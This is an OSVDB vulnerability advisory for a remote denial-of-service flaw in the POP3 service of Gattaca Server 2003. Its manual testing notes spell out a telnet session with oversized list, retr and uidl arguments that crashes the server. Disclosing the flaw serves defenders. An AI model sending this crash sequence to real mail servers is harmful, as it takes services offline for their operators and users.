Gattaca Server 2003 POP3 DoS

2004-07-15T07:17:10
ID OSVDB:7925
Type osvdb
Reporter Dr_insane(dr_insane@pathfinder.gr)
Modified 2004-07-15T07:17:10

Description

Vulnerability Description

Gattaca Server 2003 contains a flaw that may allow a remote denial of service. The issue is triggered when an attacker enters specially crafted list, retr and uidl commands resulting in a loss of availability for the server.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Gattaca Server 2003 contains a flaw that may allow a remote denial of service. The issue is triggered when an attacker enters specially crafted list, retr and uidl commands resulting in a loss of availability for the server.

Manual Testing Notes

C:\>telnet [victim] 110 +OK GeeOS/1.1 POP3 Server ver 1.0, ready. user test1 +OK User name accepted, password please pass test1 +OK GeeOS mail box open list 99999999999999999999999 retr 99999999999999999999999 uidl 98409583490583409539405

The commands above cause the server to crash. The crash produces the following error message: "Unhandled exception in: geeosserv.exe (TMAIL.DLL):0x0000005: access violation.

References:

Vendor URL: http://www.gattaca-server.com/ Secunia Advisory ID:12071 Related OSVDB ID: 7922 Related OSVDB ID: 7924 Related OSVDB ID: 8143 Related OSVDB ID: 7926 Related OSVDB ID: 7923 Related OSVDB ID: 7927 Other Advisory URL: http://members.lycos.co.uk/r34ct/main/Gattaca%20Server%202003.txt ISS X-Force ID: 16703